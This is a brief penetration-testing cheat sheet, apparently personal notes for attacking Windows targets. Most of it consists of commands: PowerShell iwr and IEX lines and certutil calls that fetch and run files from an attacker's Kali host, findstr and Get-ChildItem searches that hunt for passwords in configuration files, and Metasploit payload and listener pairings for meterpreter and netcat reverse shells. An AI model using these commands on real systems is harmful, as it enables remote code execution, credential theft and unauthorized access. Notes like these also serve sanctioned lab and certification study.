# Try different `wget` type commands - depending on config and Defender, etc. state, try the below commands when moving files to a WIN target - `iwr` ```powershell iwr http://<Kali_ip>:<port>/<file> -usebasicparsing iwr -uri "http://<Kali_ip>:<port>/<file>" -outfile <out_file> ``` - `iex (iwr)` ```powershell powershell.exe -Command IEX (IWR http://<Kali_ip>:<port>/<file>) powershell -c IEX (iwr http://<Kali_ip>:<port>/<file> -usebasicparsing) powershell IEX (iwr -uri 'http://<Kali_ip>:<port>/<file>') ``` - `certutil` ```powershell certutil.exe -urlcache -split -f http://<Kali_ip>:<port>/<file> <out/file> ``` - `curl` ```powershell curl http://<Kali_ip>:<port>/<file> ``` - `wget` ```powershell wget "http://<Kali_ip>:<port>/<file>" -outfile <out_file> ``` # Try multiple `find` type commands ```powershell findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml 2>$null get-childitem -Path "C:\" -Filter "password" -Recurse 2>$null findstr /spin "password" *.* 2>$null #use from c:\ ``` # Type multiple payload+listeners combos - `/exploit/windows/smb/smb-delivery` msf module - `.asp` payload with `windows/meterpreter/reverse_tcp` and `exploit/multi/handler` - `.exe` payload `windows/reverse_tcp` and `nc`